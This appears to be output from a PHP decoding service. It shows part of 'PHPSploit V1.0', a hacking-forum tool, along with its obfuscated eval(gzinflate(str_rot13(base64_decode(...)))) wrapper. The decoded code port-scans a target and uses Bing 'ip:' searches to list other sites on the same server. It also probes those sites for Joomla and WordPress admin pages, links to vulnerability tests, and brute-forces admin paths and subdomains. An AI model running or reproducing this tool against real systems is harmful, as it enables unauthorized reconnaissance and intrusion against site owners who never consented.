<span style="float: right;"><table><tr><td>Verified: <span id="verified">0</span> / <span id="total">0</span></td><td><input type="submit" name="xploit_submit" value="Search !" align="right" /></td></tr><tr><td><br>[email protected] www.sec4ever.com</td></tr></table></span>
</form><br>
';
?>
</div>
<?php
echo '
<br>
</div> <!-- /tube -->
</div> <!-- /red -->
</td><td valign=top>
';
if($_POST['xploit_submit'])
{
echo '
<div class="green">
<div class="tube" id="rightcol">';
echo '
Infos about website:<br>
*******************/<br>
<table width=100% style="background: #222; border: 1px solid #111;">
<td>
<img src="http://open.thumbshots.org/image.pxf?url='.$_POST['xploit_url'].'">
</td>
<td>
<textarea style="width:100%;height:88px;background:#555;margin-left:-15px">If ROBOTS.TXT exist,you see it here
';
$url_robots = str_replace("http://", "", $_POST['xploit_url']);
$robots = 'http://'.$url_robots.'/robots.txt';
$affiche_robots = file_get_contents($robots);
echo $affiche_robots;
echo '</textarea></td></tr></table>
<br>
Ports scanner:<br>
*************/
<div class="tube" id="portbox">
<table width=100% style="background: #222; border: 1px solid #111;"><tr><td>
';
// Port scanner
$port = array("21", "23", "25", "80", "110", "139", "445", "1433", "1521", "1723", "3306", "3389", "5900", "8080");
$port_name = array("(FTP)", "(TELNET)", "(SMTP)", "(HTTP)", "(POP3)", "(NETBIOS-SSN)", "(MICROSOFT-DS)", "(MS-SQL-S)", "(NCUBE-LM)", "(PPTP)", "(MYSQL)", "(MS-WBT-SERVER)", "()", "(WEBCACHE)");
$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);
$ip_target = gethostbyname("".$site."");
for($i=0;$i<12;$i++)
{
$fp = fsockopen($ip_target,$port[$i],$errno,$errstr,0.1);
if($fp)
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>OPEN</b> on " . $ip_target . "<br>";
fclose($fp);
}
else
{
echo "<font color=#ff0000>". $port_name[$i] ."</font> port " . $port[$i] . " <b>CLOSED</b> on " . $ip_target . "<br>";
}
flush();
}
//-------------------------------------------
echo '
</td></table></div>
';
echo '
Found ones:<br />
***********/<br>';
echo '
</div> <!-- /tube -->
</div> <!-- /green -->
</td></tr></table>
<div class="yellow">
';
echo '
Websites on the server:<br>
*********************/<br>
';
if($_POST['xploit_submit'])
{
$dorkk = "ip:".$ip_target;
$pageNum = 0;
for($pageNum = 0; $pageNum < 10; $pageNum++)
{
$bing = file_get_contents("http://www.bing.com/search?q=".str_replace(" ","+",$dorkk)."&go=&filt=all&first=".$pageNum."");
if(!preg_match("/No results found for/",$bing))
{
preg_match_all("/<h3><a href=\"(.*?)\">/",$bing,$sites);
if(count($sites[1])==0)
{return false;}
for($i=0 ; $i < count($sites[1]);$i++)
{
$site2 = str_replace(array("http://","https://","www."),"",$sites[1][$i]);
$site2 = substr($site2,0,strpos($site2,"/",0));;
if(!in_array($site2,$arrayy))
{
//Search for JOOMLA & WORDPRESS
$headers_joomla = @get_headers("http://".$site2."/administrator");
$headers_wordpress = @get_headers("http://".$site2."/wp-admin");
if(strpos($headers_joomla[0],'404') === false)
{
$joomla = "joomla";
$site3 = $site2." (JOOMLA) | <a href='#' class='testvuln".$joomla.''.$i."'>TEST VULNERABILITY</a>";
echo $site3. "<br>";
?>
<script>
//commentaudio
$('.testvuln<?php echo $joomla.''.$i;?>').live("click",function()
{
$('#showtest<?php echo $joomla.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $joomla.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $joomla; ?>");
return false;
});
</script>
<div id="showtest<?php echo $joomla.''.$i;?>">
<p>
</p>
</div>
<?php
}
elseif(strpos($headers_wordpress[0],'404') === false)
{
$wordpress = "wordpress";
$site3 = $site2." (WORDPRESS) | <a href='#' class='testvuln".$wordpress.''.$i."'>TEST VULNERABILITY</a>";
echo $site3. "<br>";
?>
<script>
//commentaudio
$('.testvuln<?php echo $wordpress.''.$i;?>').live("click",function()
{
$('#showtest<?php echo $wordpress.''.$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo $wordpress.''.$i;?>').load("adm.php?webvuln=<?php echo $site2;?>&what=<?php echo $wordpress; ?>");
return false;
});
</script>
<div id="showtest<?php echo $wordpress.''.$i;?>">
<p>
</p>
</div>
<?php
}
else
{
echo $site2. " | <a href='#' class='testvuln".$i."'>TEST VULNERABILITY</a><br>";
$site4 = str_replace("www.", "", $site2);
$site4 = str_replace("http://", "", $site2);
?>
<script>
$('.testvuln<?php echo $i;?>').live("click",function()
{
$('#showtest<?php echo "1".$i;?>').html('<p><center><img src="http://www.vojnilo.com/images/load.png" /></center></p>');
$('#showtest<?php echo "1".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=bing&page=1");
$('#showtest<?php echo "2".$i;?>').load("adm.php?dork=<?php echo $site4;?>&setype=google&page=1");
return false;
});
</script>
<div id="showtest<?php echo "1".$i;?>">
<p>
</p>
</div>
<div id="showtest<?php echo "2".$i;?>">
<p>
</p>
</div>
<?php
}
array_push($arrayy,$site2);
}
}
$pageNum += 10;
}
}
//$array = array_unique($uSites);
//for($i=0;$i<count($array);$i++){echo $array[$i]."<br />";}
}
echo '
</div>
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">';
echo '
Admin page Finder: <br />
******************/<br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all">';
}
}
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
if($br == 1) $msg .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
if($stop == 1) exit;
@flush();@ob_flush();
}
function showport($site, $port) {
if($br == 1) $msg .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$site."', '".$port."');</script>";
if($stop == 1) exit;
@flush();@ob_flush();
}
function check($x, $front=0) {
global $_POST,$site,$false;
if($front == 0) $t = $site.$x;
else $t = 'http://'.$x.'.'.$site.'/';
$headers = get_headers($t);
if (!eregi('200', $headers[0])) return 0;
$data = @file_get_contents($t);
if($_POST['xploit_404string'] == "") if($data == $false) return 0;
if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
return 1;
}
// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
$site = str_replace("http://", "", $site);
$site = "http://".$site;
if ($site[strlen($site)-1] != "/") $site .= "/";
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("
", "", $list['end']);
$list['front'] = str_replace("
", "", $list['front']);
$pathes = explode("
", $list['end']);
$frontpathes = explode("
", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach($pathes as $path) {
show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach($frontpathes as $frontpath) {
show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
}
}
}
?><?
Did this file decode correctly?
Original Code
<?
# PHPSploit V1.0
# Coded By Stalk3R
# For Sec4Ever.Com
eval(gzinflate(str_rot13(base64_decode('')))); ?>
Function Calls
gzinflate | 86 |
str_rot13 | 39 |
base64_decode | 86 |
Stats
MD5 | 5768e3099ff84365c393419856927a8d |
Eval Count | 86 |
Decode Time | 1521 ms |